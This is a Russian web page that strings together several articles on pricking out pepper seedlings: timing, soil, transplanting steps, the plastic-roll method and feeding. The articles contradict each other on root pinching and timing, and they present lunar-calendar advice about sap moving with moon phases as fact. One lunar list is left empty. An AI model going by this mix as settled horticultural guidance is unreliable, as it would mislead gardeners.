2 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Принцип пикировки рассады перца в домашних условиях

Как правильно пикировать рассаду перца?

Трудно представить себе дачный участок без грядки сладкого перца, занимающего в нашем рационе почетное место благодаря отличным вкусовым качествам, и большому содержанию витамина С. Однако для того чтобы данная овощная культура могла порадовать обилием урожая, необходимо выполнить ряд мероприятий, связанных с выращиванием и уходом. Важным этапом данного аграрного процесса является пикировка рассады.

Что такое пикировка перца?

Процедура представляет собой пересадку молодых саженцев, произрастающих в одном посадочном контейнере в отдельные емкости для дальнейшего произрастания с использованием нового грунта.

Нужно ли пикировать рассаду перца?

По поводу пикирования возникает множество споров среди опытных огородников, так как рассада перцев очень чувствительна к пересадке. Если семена были посеяны в отдельные горшочки, то в пикировке нет необходимости.

Данная процедура необходима для саженцев, произрастающих в общей посадочной емкости. В период роста растения, близко расположенные друг к другу, начинают испытывать нехватку питательных веществ, и недостаток освещения, что замедляет их развитие.
к содержанию ↑

Перец — пикировка рассады преимущества и недостатки

Пикирование имеет ряд преимуществ:

  1. Пересадка молодого растения в отдельные горшки предотвратит переплетение корневой системы, что улучшит ее развитие и облегчит впоследствии высадку на постоянное место произрастания.
  2. Необходимое количество питательных веществ в почве и хорошее освещение обеспечат развитие мощной корневой системы, и надземной части саженцев, устойчивой к сильным порывам ветра.
  3. Отбраковываются слабые, плохо развитые экземпляры.
  4. Благодаря данной процедуре значительно увеличивается урожайность.
  5. Минимизируется риск развития грибковых заболеваний.

Недостатком данной процедуры является:

  1. Трудоемкость процесса.
  2. Риск повреждения еще неокрепшей корневой системы.
  3. Замедление роста растений.

Когда следует пикировать перец?

Рассаживать рассаду можно на следующих сроках:

  1. После раскрытия зародышевых (семядольных) листков.
  2. При появлении двух—трех настоящих листьев.
  3. При наличии пяти—шести листов.

Опытные огородники в редких случаях осуществляют пикировку в стадии семядольных листочков. В этот период растение имеет лишь центральный корень, который в случае повреждения отмирает и растение погибает.

Наиболее приемлемым периодом для пересадки считается 16— 21 день после прорастания всходов при наличии у саженца двух — трех настоящих листов. К этому моменту корневая система становится более крепкой и растение легче адаптируется в новом грунте.

На стадии 5—6 листков корневая система растений начинает разрастаться в стороны, что повлечет за собой переплетение корней, а соответственно увеличит риск их повреждения.
к содержанию ↑

Сроки пикировки по лунному календарю

Опытные фермеры рекомендуют при выполнении данной процедуры ориентироваться на сроки, указанные в лунном календаре. Наиболее благоприятным периодом считается фаза растущей Луны в созвездии:

Неблагоприятными фазами являются новолуние и полнолуние. Луна в этот период находится в созвездиях:

Месяц Благоприятные дни Неблагоприятные дни
Март 2; 3; 7; 10; 12; 16; 17 1; 4; 5;18; 21; 23; 24; 25; 26; 28; 29; 30
Апрель 2; 6; 7; 9; 11 5

к содержанию ↑

Что требуется для проведения пикировки

Для проведения данной агротехнической процедуры нужно заранее подготовить почвенную смесь и емкости объемом 200—250 мл. для пересадки саженцев, обработанные для обеззараживания 1% раствором перманганата калия.

Для приготовления грунта необходимо смещать ингредиенты в следующем соотношении:

  • земля садовая—2 части;
  • перегной—2 части;
  • торф—2 части;
  • песок крупный речной—1 часть.

Перец не любит кислого грунта, поэтому для нормализации кислотности почвы рекомендуется в готовую почвенную смесь добавить 250 грамм древесной золы на 10 литров. Субстрат рекомендуется выдержать 20 мину в СВЧ печи или пролить крепким раствором горячей марганцовки для обеззараживания и уничтожения личинок вредителей.


Для пересадки рассады можно использовать торфяные горшочки или пластиковые стаканы с отверстиями для вывода излишков влаги с почвы. Если стаканчики прозрачные необходимо обернуть их тонким слоем бумаги, или газетой чтобы предотвратить попадание света на корни.
к содержанию ↑

Как правильно пикировать перец: пошаговая инструкция

Чтобы рассада успешно прижилась после пикировки и не остановилась в росте необходимо придерживаться следующих рекомендаций:

  1. За три часа до выполнения пересадки рассаду хорошо поливают. Увлажненный грунт будет способствовать снижению риска повреждения хрупкой корневой системы.
  2. Приготовленные емкости наполняют грунтом на 2/3 объема, уплотняют его, делают в нем углубление и увлажняют почву.
  3. Аккуратно, при помощи специального приспособления, или чайной ложки вынимают саженец, отделяют от остальных, придерживая его за листочки. Если отделилось сразу несколько экземпляров, то в первую очередь рассаживают наиболее крепкие, и хорошо развитые. Извлекают растение с небольшим количеством почвы, чтобы не повредить еще слабый корень.
  4. Основной корень прищипывать не нужно.
  5. Перемещают растение в заранее приготовленную емкость, следя за тем, чтобы корни располагались в углублении свободно, не переплетались и не заворачивались против часовой стрелки. При неправильном положении корней рост рассады останавливается.
  6. Корень погружают в почву немного глубже прежней глубины, затем аккуратно приподнимают, чтобы земля осыпалась под корешки. Следует избегать чрезмерного заглубления, так как это затормозит развитие и может привести к загниванию корневой системы. Однако если в процессе роста наблюдалось чрезмерное вытягивание рассады, то при пикировке его рекомендуется заглубить на 1 см.
  7. Емкости с рассадой устанавливают на поддон, почву досыпают, и слегка уплотняют вокруг саженца, обжимая со всех сторон.
  8. После пересадки нужно выполнить умеренный полив теплой отстоянной водой.
  9. Через 30 минут после полива излишки влаги из поддона удаляют.
  10. Емкости с растениями устанавливают на прежнее место, притенив от солнечного света, и оставляют их на два — три дня для адаптации. Не рекомендуется перемещать пикированную рассаду в другое место, так как перемена микроклимата увеличит адаптационный период.
  11. Спустя три дня после пересадки необходимо организовать дополнительное освещение. Длительность светового дня должна составлять 8 часов.

Уход за рассадой после пикировки

После пикирования за рассадой необходим следующий уход:

  1. Обязательное соблюдение температурного режима. Температура в комнате должна быть не ниже +21°С днем, и +16°С в ночное время. По прошествии трех дней температуру повышают до +24°С в дневное время и +18°С ночью.
  2. Полив должен быть умеренным. Осуществляют его не чаще двух раз в неделю, по мере высыхания верхнего слоя почвы. Воду для полива используют теплую, отстоянную в течение 24 часов. При недостаточной влажности воздуха в комнате рекомендуется проводить орошение.
  3. Рыхление выполняют после каждого полива с целью предотвращения застоя влаги в почве, и образования корки на поверхности грунта, препятствующей насыщению кислородом корневой системы.
  4. Подкормка растения осуществляется спустя 15 дней после пикирования. Для этих целей можно использовать:

  • дрожжевую подкормку (100 грамм дрожжей развести в 10 литрах воды);
  • отвар крапивы (100 грамм крапивы залить 1 литром кипятка, настоять, процедить);
  • раствор зольный (20 грамм золы растворить в 1 литре воды, настоять 12 часов);
  • комплексные минеральные удобрения (суперфосфат—8грамм, соль калийная—3 грамма, мочевина—1 грамм, вода—2 литра);
  • перепревший навоз.

Спустя две недели подкормку можно повторить. Азотсодержащие удобрения исключить, чтобы предотвратить чрезмерное вытягивание рассады.

  1. За две недели до высадки рассады на постоянное место произрастания необходимо выполнить закаливание. При установлении теплой погоды поддоны с саженцами рекомендуется выносить на свежий воздух и оставлять ненадолго в местах, защищенных от прямых солнечных лучей и порывов холодного ветра. Время пребывания постепенно увеличивают.

Возможные проблемы после пикировки и способы их решения

Не редко после пикировки огородники сталкиваются со следующими проблемами:

  • Рост саженцев замедлился или остановился. Это происходит из-за повреждения корешков. Растение восстановится, когда отрастут новые корешки. Еще одной причиной остановки роста может быть плохо уплотненный грунт после пересадки, когда между почвой и корнями растений образовалось воздушное пространство. Корни начинают подсыхать. Устранить проблему можно аккуратно уплотнив грунт вокруг саженца.
  • Поникшие, вялые листья. Данная проблема возникает при повреждении корневой системы. Оборванные корешки не впитывают влагу. После отрастания новых корней тургор восстановится.

  • Бледный окрас листьев свидетельствует о недостаточности освещения. Необходимо организовать дополнительное освещение при помощи ламп дневного света.
  • Ствол истончился и изменил цвет. Данные симптомы свидетельствуют о возникновении у растения грибкового заболевания — черная ножка. Причина возникновения заболевания — чрезмерная влажность почвы. Саженец рекомендуется пересадить в новый грунт. Помещение, в котором произрастает рассада, рекомендуется регулярно проветривать.

По поводу необходимости пикировки между аграриями возникают частые споры. Однако необходимо учитывать, что данная процедура, при правильном ее выполнении, благотворно скажется на росте рассады и порадует щедрым урожаем.

Ждем мнение наших читателей по вопросу пикировки рассады.

Принцип пикировки рассады перца в домашних условиях

Выращивание рассады болгарского или горького перца в домашних условиях всегда вызывает определенные трудности, потому что корневая система молодого растения хрупкая по своей структуре. О том, как правильно и аккуратно проводить пикирование рассады перца, расскажем в статье.

Принцип пикировки рассады перца в домашних условиях

Зачем нужно пикировать

Перечная рассада требовательна к правильному пересаживанию. Корни перца весьма хрупкие и плохо переносят изменения условий выращивания, и при нарушении своей структуры нуждаются в более длительном времени на восстановление.

Процесс пикировки заключается в том, что каждый молодой куст (возраста 20-25 дней после высаживания семян) должен пересаживаться в отдельную емкость, чтобы рассада могла получать больше питательных веществ, чем в случае высаживания в общем контейнере. Отдельные емкости помогают рассаде быстрее формировать свой рост и всю корневую систему.

При выращивании вытянувшейся рассады в общем контейнере, наблюдаются некоторые негативные моменты:

  1. Растения начинают затенять друг друга.
  2. Корневые системы переплетаются, что существенно затрудняет процесс высаживания в теплицу или открытый грунт.

Именно по этой причине пикировать рассаду перца нужно обязательно. Это положительно скажется не только на формировании роста стебля, но и на характеристиках корневой системы.

Время проведения процедуры

Самый оптимальный вариант – это пикировка рассады перца на ранних сроках. Молодые растения лучше растут на новых местах и быстрее укореняются в почве. Пикировка рассады перцев должна проводиться только в тот момент, когда на растениях появится 2 пары полноценно сформированных листьев.

Считается, что идеальное время для пикирования – 2-3 недели после появления первых всходов.

Некоторые огородники предпочитают пересаживать растение в тот момент, когда только начали формироваться семядоли. Другая часть дачников считает, что лучшее время для пикировки рассады сладкого перца – после сформированных 3-4 пар листьев. Но это может вызвать определенные трудности, т.к корневая система уже практически сформировалась и может немного затруднить процесс пересадки.

Подготовительные этапы

Перед тем, как пикировать рассаду перца, нужно правильно ее подготовить.

Подготовка почвы

Лучше всего подойдут смеси из торфа, огородной земли и песка, в соотношении 1:2:1. Также вы можете добавить небольшое количество минеральных веществ (суперфосфат или аммиачную селитру), которые сделают почву более легкой и питательной.

Подготовка емкостей

Удобные баночки для рассады

Далее следует обратить внимание на емкости для посадки. Идеальный объем контейнеров составляет 250-350 мл. В принципе, часто встречаются контейнеры больших объемов. Но, они не особо пригодны для пикирования, потому что корни растения расположены близко к поверхности земли, поэтому им будет сложно заполнить весь периметр стакана или горшка. В результате, на пустом месте могут возникнуть окисленные участки, которые приведут к риску возникновения болезней.

Пикировка рассады должна проводиться только в емкости с системой дренажа.

Полив

За несколько дней до посадки рекомендуется отказаться от проведения полива, ведь влага размягчит почву, что существенно осложнит процесс пересаживания в открытый грунт или теплицу.

Проведение пикировки

  1. Для начала нужно уплотнить землю в горшке или стакане. В центральной части делается отверстие, глубиной, равной длине корней, и заливается небольшим количеством воды.
  2. Из контейнера нужно аккуратно достать сеянец. В принципе, для простоты действий, можно использовать небольшую садовую лопатку.
  3. Сеянец нужно переместить в подготовленную ямку и распределить корни таким образом, чтобы они заполняли все пространство лунки.
  4. Пересадка проводится на глубину, таким образом, чтобы корни были впритык. Излишняя пустота приведет к загниванию корневой системы.
  5. После перенесения сеянца обязательно нужно уплотнить почву вокруг него.
  6. Теперь следует полить корни 0,5 л теплой воды.

Довольно часто наблюдаются конфликтные споры по поводу прищипывания растения. Если обратить внимание на то, что корни чувствительны к повреждениям, то эту процедуру лучше не проводить. Специалисты убеждены в том, что прищипывание можно проводить только в том случае, если растение набрало большой рост или корень оказался довольно большой длины.

Корень не должен загибаться в направлении часовой стрелки, ведь в этом случае моментально приостанавливается рост сеянца и дальнейшее развитие окажется невозможным. Для правильного размещения корней нужно изначально положить растение в землю, а после уплотнения земли немного потянуть вверх. Это позволит корешку расположиться в оптимальном положении и выровняться в земле.

Пикировочному перцу необходим правильный уход.

После проведения пикировки сеянцы нуждаются в большом количестве солнечного света. Располагать их на подоконнике или балконе нужно только на 3 день. До этого момента лучше держать емкости возле батареи, где сеянцы смогут получить нужное количество тепла.

Следующий важный принцип ухода заключается в подкормках. Первое внесение удобрений нужно проводить через полторы недели после пересаживания. В этот момент целесообразно использовать минеральные удобрения. Идеальный вариант – это 50 г селитры, 40 г суперфосфата и 20 г калия, разведенных в 10-литровом ведре теплой воды. Под каждое растение нужно вливать не более 120 мл удобрения.

Чтобы защитить сеянцы от вредителей или заболеваний, можно провести подкормку. Для этого в 10 л теплой воды следует развести 4 г борной кислоты, 3 г купороса меди и 2 г марганца. Полив проводится в расчете 20 мл на 1 куст. Следующие 2 подкормки проводятся с интервалом в 2 недели, с чередованием минеральных и органических веществ.

Как правильно пикировать рассаду перца

Перец – культура нежная. Он требует солнце и бережный уход. Сегодня перец, благодаря теплицам, можно выращивать в разных областях. Самый ответственный момент при культивировании растения – пикировка рассады.

Что такое пикировка и для чего она нужна

Значение термина происходит от французского слова «piquet» — «кол, колышек» .
Прямое назначение пикировки – это пересадка сеянцев в отдельную посуду из общей емкости. Также пикировкой называют удаление у стержневого корешка кончика. Это стимулирует усиленный рост разветвление корней растения.

Овощеводы знают, что пикирование переносит хорошо не всякая культура, поэтому часто высевают семя сразу по отдельным емкостям.

Но многие садоводы в целях экономии места вынуждены выращивать рассаду в общих контейнерах. И в таком случае пикирование сеянцев необходимо, так как посеянная слишком густо рассада в одну емкость не сможет дать хороший урожай.

Пикирование обязательно проводят:

  • Для того, чтобы отделить ослабленные растения от наиболее крепких для последующего плодотворного выращивания.
  • Для густо посаженных растений, чтобы они не затеняли друг друга. От недостатка света перцы будут расти вытянутыми, хилыми. Рост таких растений значительно замедлится и не удастся получить богатый урожай от такой рассады.
  • Для предотвращения сплетения корневой системы у ростков. При пересадке рассады сложно будет отделить ростки друг от друга, не повредив корни. А перцы считаются нежной и чувствительной культурой с очень ранимой корневой системой, соответственно, болезненно переносят такую процедуру.

Когда следует проводить пикировку рассады перца

Процесс пикирования довольно трудоемкий и требует особого подхода. Немаловажным пунктом выступает знание о том, когда именно лучше всего проводить пикирование. Чем раньше будет проведена пикировка, тем быстрее и легче на новом месте приживется рассада перцев.

Эту процедуру лучше всего проводить в тот момент, когда у сеянцев появилась два-три настоящих листочка.

Активность солнечных лучей усиливается, рассада быстро тянется к ним. Не нужно упускать момент, ожидая, когда она слишком вытянется, или появится более 4 листиков. К этому моменту растение уже сформировало корень, и пикировка в этот момент вызовет у него сильный стресс.

Но и спешить также крайне опасно для перцев: до появления настоящих листов ростки имеют очень слабые корешки. По этой причине многие саженцы не приживаются и засыхают.

Важно! Перцы не пикируют при появлении семядольных листов, дожидаются, пока вырастут настоящие.

По лунному календарю

Многие огородники проводя пикирование рассады, учитывая благоприятные дни по Лунному календарю, и воздействие лунных фаз на растение:

  • Новолуние. В этот период в корнях происходит накопление всей живительной силы. От пересадок лучше воздержаться.
  • Растущая луна . Корневая система перенаправляет весь нектар по стеблям вверх. Идет активный рост и процветание растений. Именно в этот момент нужно заниматься пикированием сладкого перца. Даже если при пересадке корневая система будет повреждена, то растение выживает.
  • Полнолуние. Все питание находится в верхних частях культур. Все работы с растениями огородники предпочитают приостанавливать.
  • Убывающая луна. Все соки из верхушек начинают свое перемещение обратно к корням. Этот период считается нейтральным, пикирование для болгарского перца проходит хорошо.

Помимо положения луны, имеются и плодовитые знаки, нейтральные и неплодородные. Благоприятным для пикировки считается период пребывания Луны в Весах, Скорпионе, Тельце. Неблагоприятным периодом для пикировки перца считаются дни, когда Луна в Рыбе, Овне, Деве, Стрельце, Близнецах.

Подготовительные работы

До начала пикирования следует подготовить все необходимые материалы и инструменты.

В первую очередь отбирают емкости для рассады. Они могут быть из разного материала. Даже отличаться размерами и формой: картонные пакеты, пластиковые стаканы, старые кружки, специальная тара из магазина.

Вне зависимости от выбранной емкости, она обязана соответствовать 2 критериям:

  1. Для нормального развития корней, объем посуды выбирается в пределах 200-250 мл и высота ее должна быть от 10 см.
  2. Поскольку перцы нуждаются в частых поливах, емкости должны быть непромокаемые. К тому же иметь необходимый элемент – дренажное отверстие.

Посуда, предназначенная для работ, тщательно вымывается. Для предупреждения застоя воды на дне делаются отверстия. Далее тару наполняют грунтом.

Овощеводов часто интересует вопрос о составе почвы. Оптимальный вариант выбора – почвосмесь с полевой или дерновой землей, перегноем либо торфом. Еще должен в составе присутствовать песок, в качестве рыхлящего материала.

Дополнительно грунт обогащают органическими веществами. Также применяют минеральные удобрения: хлористый калий, аммиачную селитру, суперфосфат.

Как правильно пикировать рассаду перца

Хотя сам процесс пикировки совсем не сложный, но не все овощеводы правильно понимают, как пикируется рассада перцев. Самое главное – это изучить внимательно технику пересадки.

Основным правилом, и самым важным, является момент извлечения сеянца из общей тары. Все должно пройти идеально, чтобы нежные корешки не получили повреждения.

Пикировку проводят одним из способов:

1. Пересадка сеянцев :

  • За пару часов до пикировки почву с рассадой перца увлажняют. Так сеянцы легче будет извлечь из емкости, и нежные корешки не повредятся.
  • В подготовленный индивидуальный стаканчик вначале засыпают, а затем немного уплотняют почву. В центре делается лунка и обязательно увлажняется.
  • При помощи обычной лопатки росток достают вместе с комочком земли из общей посуды. Придерживают сеянец не за хрупкий стебелек, а за земляной комок. Если внизу будет заметен самый длинный главный корешок, то его кончик слегка прищипывают (примерно на четверть длины). Боковые корешки после такой процедуры начнут хорошо развиваться, и растение в будущем сможет получать больше питания.
  • Если извлечется несколько растений одновременно, то их следует аккуратно разделить, не повредив корни.
  • Затем аккуратно опустить росток в углубление так, чтобы корешки оставались прямыми и не загибались. Неправильное расположение корня (скручивание или подгибание) приведет к проблемам в развитии сеянцев.
  • Осторожно почву вокруг перчика обжать, чтобы семядольные листочки выступали над поверхностью на два сантиметра.

Сильно ростки заглублять не рекомендуется. Так как высаженные глубоко растения не образуют придаточные корни, они просто могут загнить.

Затем поливают рассаду, и если земля немного оседает, то ее присыпают почвосмесью.

2. Перевалка рассады:

Перевалку проводят в случае, когда семена сразу высаживались в индивидуальные емкости, и их необходимо просто пересадить в более объемную тару. Семена высевают в маленькие пластиковые стаканчики – 30-50 мл. В них сеянцы развиваются до момента образования настоящих листов.

Далее проводится пикировка перевалкой:

Перед началом процедуры рассада не поливается пару дней. Это делается для более легкого извлечения растений из стаканчиков. Острым ножом пластиковая емкость осторожно разрезается, и перец легко достается вместе с земляным комом. Далее проводится пересадка в новую большую емкость.

Рассада поливается и ее на 2-3 дня переставляют в тенек. При перевалке корни культуры не повреждаются, развитие не приостанавливается.

Пикировка рассады перца сладкого: видео

Уход за рассадой после пикировки

Пикированный в домашних условиях перец нуждается в особом уходе. Каждый росточек вместе со своей емкостью должен быть помещен в теплое, самое светлое место.

Если рассады много, около окна выставляют стол и располагают ее на подоконнике и на столе. От прямых лучей солнца перчик защищают, закрывая стекла бумагой. Эта мера предосторожности выдерживается 3 дня, пока растения полностью адаптируются.

Первая пара дней перцами переносится болезненно, не исключено, что они могут даже немного привянуть, но это временное явление.

Огородниками замечено, что если рассаду вернуть на прежнее место, где она стояла до пикирования, то адаптационный этап проходит гораздо быстрее. А вот при переносе сразу на новое место, рассада проболеет дольше, привыкая и восстанавливаясь.

Перепады температуры также недопустимы в эти сложные для рассады дни. Если есть возможность то ее желательно повысить на пару градусов, особенно на ночное время.

После пересаживания перцам через 2 недели требуется дополнительная подкормка, которую выполнять следует очень аккуратно. Следующую подкормку можно провести еще через 10 дней.

Самым хорошим вариантом удобрений будет крапивная вода и зола .

  • 1 ст. л. древесной золы залить одним литром кипятка. Настаивать 24 часа, затем процедить и поливать.
  • настой крапивы (100 мл измельченной травы) в сочетании с древесной золой (30 г) на 1 л воды;

Подкормки перцам дают жидкие, сочетая питание вместе с поливом.

  • Когда рассада приостанавливает рост, ей предлагают обыкновенную чайную заварку или раствор гумата.
  • А вот если замедлилось развитие, листики начали светлеть, то срочно делают подкармливание мочевиной.
  • Чтобы не возникло проблем с формированием корневой системы, перцам дают нитрофоску либо суперфосфат.

Пикирование рассады в пеленки

Очень удобный, быстрый и, главное, безопасный для рассады способ пикирования – это заворачивание ее в пеленки. Для процедуры необходимо подготовить глубокую, широкую емкость, куда после пикирования будут помещены перцы. Это могут быть обрезные баклаги, пластиковые контейнеры от фруктов, тортов или глубокие поддоны. Они очень хорошо подойдут для этого мероприятия.

Для пеленок можно применить небольшой отрезок полиэтилена. Также удобно заворачивать перцы в целлофановые пакеты для завтраков или можно разрезать любой плотный пакет.

  • В ведерке или миске подготавливают почвосмесь.
  • На стол расстилают полиэтилен размером 20×30 cм, узкой стороной к себе. В левый нижний угол кладут 2 ст.л. земли, отступив от края 5 см.
  • При помощи лопатки или ложки из общей емкости отделяют саженец и кладут его на землю. Далее корешки саженца присыпают 1 ст. л. почвосмеси.

Здесь нужно быть внимательными: семядольные листики перца должны примерно на 1 см выходить за пределы пленки.

  • Завернув пленку на 1 оборот, низ ее подгибают, и рулончик сворачивают до конца. Если имеются опасения, что может произойти застой воды при поливах, низ рулончика, где нет корешков перца, можно проткнуть в нескольких местах ножничками или шилом.
  • Готовые пеленки закрепляют резинкой, чтобы они самопроизвольно не развернулись, и устанавливают в общие емкости с высокими стенками. Как вариант, можно применить обрезанную пятилитровую бутылку или коробку из-под торта из полипропилена.
  • Если по мере роста рассады окажется, что в пеленке не достаточное количество земли, то целлофан можно легко развернуть и добавить ее необходимое количество.

Второй способ пикировки в пеленки предполагает отказаться от подгибания низа пленки. То есть целлофан с грунтом и саженцем перца просто сворачивается рулончиком. Низ остается открыт, застоя воды не будет однозначно. Эти рулончики устанавливают в контейнеры, на дно которых желательно насыпать опилки.

При пикировании в пеленки корешки перца остаются расправленными, свободно располагаются книзу, меньше травмируются.

Как правильно пикировать перец в пеленки: видео

Особенности ухода за рассадой в пеленках

Сразу после пикировки пеленочки хорошо проливаются водой. Контейнера с рассадой несколько дней, пока не пройдет укоренение, не следует выставлять под солнечные лучи.

Окно лучше занавесить марлей: она даст защиту от палящих лучей и обеспечит рассаду достаточным количеством рассеянного света. Продлить необходимый световой день можно при помощи фитоламп.

Поливать рассаду нужно умеренно: лучше недолить, чем перелить.

Пеленки хорошо сохраняют влагу в почве, и рассаде этого будет вполне достаточно. При переувлажнении перцы начнут вытягиваться, также могут появиться различные болезни. Также возможно увлажнять опилки в контейнере, а перец сам уже найдет необходимую влагу.

Пикировка рассады перца без земли — видео

Пикировка всегда остается неотъемлемой частью многих растений, в том числе и перцев. Пикирование перцев крайне редко проходит без повреждения корневой системы культуры, поэтому бережное ее выполнение выступает гарантом хорошего урожая.

Когда и как пикировать рассаду перцев. 2 способа пикировки и уход за рассадой

Вырастить сладкий перец порой довольно сложно, поскольку это довольно капризная и прихотливая культура. Одним из важных моментов выращивания является пикировка перцев. Неправильное ее проведение позже снижает урожай, а порой приводит к гибели растения.

Конечно, выращивают перец и без пикировки, но только тогда, когда семечко высевается сразу в большую емкость. Но такой способ порой не оправдывает себя: семена могут не взойти, а сеянцы вырастают плохого качества. А значит, емкости с рассадой и место на подоконнике были потрачены зря.

В последнее время огородники чаще используют метод пикировки рассады из пеленок. Этот способ имеет немало преимуществ в отличие от классического варианта. Хотя последний способ до сих пор часто используется огородниками. Разберем эти 2 способа пикировки подробно.

Когда пикировать рассаду перцев

Обычно пикировка перцев проводится через 15-20 дней после посева семян. Однако, в каждом случае смотрят по внешнему виду растения и наличию двух настоящих листьев. Главное, при пикировке маленьких сеянцев будьте осторожны с выемкой рассады из почвы. Торопиться не нужно, потому что чем старше перец, тем он легче перенесет пересадку.

Пересаживая сеянцы, отбирают только здоровые и крепкие росточки. Больные и хилые отбраковываются. Из них, даже если их выходить, все равно не получить хорошего урожая. Важным критерием отбора служит белый крепкий корешок. Если он коричневого цвета, не жалейте, выбрасывайте такой сеянец.

Когда проводить пикировку по Лунному календарю в 2020 году

Благоприятные дни на растущую Луну, в этот период рекомендуется пересаживать растения, обрабатывать и рыхлить почву. Это самые благоприятные дни, когда делают все подземные дела. В эти дни жизненные процессы в корнях замедляются и риск их повреждения – минимальный.

А вот на убывающую Луну основные жизненные процессы протекают в корневой системе, в подземной части растения. Эти дни будут неблагоприятными для пересадки, пикировки, глубокого рыхления почвы.

Приверженцам посадки растений по Лунному календарю следует обратить внимание на эти числа в 2020 году:

  • Благоприятные дни для пикировки — 24 февраля — 8 марта; 25 марта — 7 апреля, когда Луна растущая.
  • Неблагоприятные дни — 10-22 февраля, 10-23 марта.

Классический способ пикировки перцев

Пикировка – пересаживание подросшей загущенной рассады из общего контейнера в отдельные горшочки или в другую емкость, но с более редкой посадкой. Обычно процедура пикирования проводится в стадии образования первых двух настоящих листочков. Именно в это время сеянцы полны жизненных сил, помогающих им быстрее адаптироваться в новых условиях, не болеть и быстрее тронуться в рост.

Зачем пикируют рассаду перцев? Противники пикировки утверждают, в ее процессе повреждаются хрупкие корешки, и растение болезненно переживает пересадку, останавливаясь в росте. Сторонники считают, пикировка, наоборот, полезна, считая, что подобная процедура укрепляет растение. А небольшая задержка в росте только полезна, предупреждая вытягивание сеянцев.

Пересадка перцев

  1. За 1-2 часа до пересадки рассаду в общей емкости хорошо поливают. Выкапывать сенцы из сухого грунта нельзя, корешки в этом случае обязательно травмируются.
  2. Тем временем приготовьте емкости, куда будете пересаживать сеянцы — контейнерные ящики либо одноразовые стаканчики емкостью не менее 200 мл;
  3. Насыпьте в емкости питательный грунт слоем в 10 см, сделайте на поверхности почвы бороздки, а затем толстой палочкой сделайте углубления до самого дна на расстоянии 5 см друг от друга;
  4. Осторожно, поддевая рассаду вилкой или маленькой лопаточкой, из общего ящика достают саженец вместе с комом земли, стараясь не повредить корешки растения.
  5. Ставим растение вместе с комом земли в углубление, присыпаем его землей, слегка прижимая к стебельку.

Полив

Сразу после пикировки растение не поливают. Влаги, оставшейся с комом земли, растению хватит на 5-6 дней. Поэтому первый полив проводят не раньше этого срока слабо-розовым раствором марганца.

В дальнейшем рассаду поливают примерно раз в 5-6 дней. Кратность полива зависит от того, в какую емкость пикировали саженец. Так, в 200-граммовом стаканчике земля пересыхает быстрее, значит придется и чаще поливать. В большом стаканчике или ящике, полив проводится реже.

Сплошной полив не проводят, надо чтобы почва была увлажненной, но не сырой. Полив проводится по бороздкам, оставляя сухими валики с рассадой. Иначе рассада легко поразится черной ножкой, опасным заболеванием рассады, приводящее к гибели растения.

Подкормки

Проводить подкормку в этом случае не обязательно, поскольку питательных веществ в общем ящике и в уже пересаженных емкостях хватает до той поры, когда перцы будут высаживаться в теплицу или открытый грунт.

Пикировка рассады перцев в пеленки

Пеленка – обычный упаковочный материал из прозрачных полиэтиленовых пакетов размером 20х30 см. Такой метод имеет немало преимуществ. Самое главное — экономия пространства. Кроме того, пересаживая растения таким способом, обеспечивается полная сохранность корешков. Так пересаживают рассаду любых овощных культур, даже капусты.

Поскольку этот метод появился не так давно, некоторые путают пеленки и улитками. Улитка используется с целью проращивания семян и подготовки растения к пикировке. А пеленка предназначена для выращивания рассады вплоть до ее пересадки в открытый грунт.

Как пикировать в пеленки рассаду перцев

Прежде, за 1-2 часа до пересадки, хорошо пролейте сеянцы в улитке, так они легче достаются из земли, а корешки не травмируются. Роль пеленок играют обычные полиэтиленовые пакеты. Длинные брать не стоит, иначе с ними труднее работать.

Также заранее подготовьте землю для пеленок. Сухую землю увлажните до состояния умеренной влажности, чтобы при сжатии в ладони она лепилась в комок. Чтобы не появилась черная ножка на рассаде, земля и вода должны быть теплыми.

Пересадка – пошаговая инструкция

Затем приступают непосредственно к пересадке.

  1. На развернутый пакет насыпают 2-3 ст. л. влажной почвы. Если она покажется сухой, опрыскайте ее из пульверизатора теплой водой. Но сильно мочить не нужно, чтобы из нее вода не стекала;
  2. Потом аккуратно разверните улитку до первых сеянцев. Осторожно возьмите сеянец и положите его на землю на пеленке так, чтобы он был заглублен на том же уровне, что и в улитке. ;
  3. Затем на корешок накладывают еще 1-2 ст. л. земли и пеленку (пакет) заворачивают рулетиком. Из-за влажности земли конструкция не рассыпается. Постарайтесь, чтобы саженец оказался в середине рулончика;
  4. Так поступайте, пока не развернете всю улитку и не пересадите все сеянцы;
  5. Получившиеся рулончики плотно составляют в поддон, роль которого играет обычная коробка из-под торта или прозрачный контейнер, но без отверстий. Для предотвращения загнивания на дно коробки насыпают опилки слоем в 2-3 см. Они впитывают в себя излишнюю влагу, а за счет своей рыхлости и воздухопроницаемости создадут благоприятный микроклимат.

Если рассада предназначена для открытого грунта, ее высаживают парочками. Таким образом растения крепче стоят в земле и поддерживают друг друга.

Заглублять или не заглублять рассаду?

Стебель перца не способен образовывать дополнительные корни, как, например, томаты. Заглубление черешка приводит к загниванию корня и черной ножке. Поэтому при пикировке стебель высаживают до той точки заглубления, что и при выращивании до пикировки.

Уход за рассадой в пеленках

Первая подкормка проводится через 2 недели после пикировки, вторая – через 10 дней после первой органическим либо комплексным удобрениями.

Признаком хорошего развития рассады перца является, окрашенная бледно-зеленый цвет, макушка, в то время, когда основная масса листьев имеет темно-зеленую окраску.

Если рассада растет на подоконнике, не забывайте контейнер время от времени поворачивать, тогда рассада не вытягивается и растет равномерно.

Сразу, как только распикируете рассаду, не ставьте ее под яркий свет. Дайте ей спокойное рассеянное освещение на период адаптации. Но в дальнейшем помните, что досвечивание рассады надо будет обеспечить, так как перец очень требователен к освещению. Если у рассады начинают бледнеть листья и стебли, либо истончаются и удлиняются междуузлия, значит ей не хватает света.

Видео о том, как правильно пикировать рассаду перца

Если вы посадили рассаду не в пеленки, как было рассказано в этой статье, а обычным способом, подросшую рассаду необходимо пикировать. В этом видео вы узнаете новый способ пикировки, посмотрите обязательно, возможно, вы последуете и также сделаете.


А я вам желаю успехов и хороших урожаев!

5 маленьких секретов выращивания рассады перца без пикировки

Приветствую всех бывалых и начинающих огородников! Обычно уже в феврале-марте начинаются подготовительные работы: готовятся к посадке семена, рассада. Кто-то выращивает рассаду сам, некоторые предпочитают покупать ее на рынке.

Сегодня я хочу рассказать Вам о том, почему рассада перца в домашних условиях без пикировки, выращенная собственноручно гораздо лучше, чем покупная. Постараюсь также поделиться некоторыми секретами такого способа выращивания.

Преимущества домашней рассады

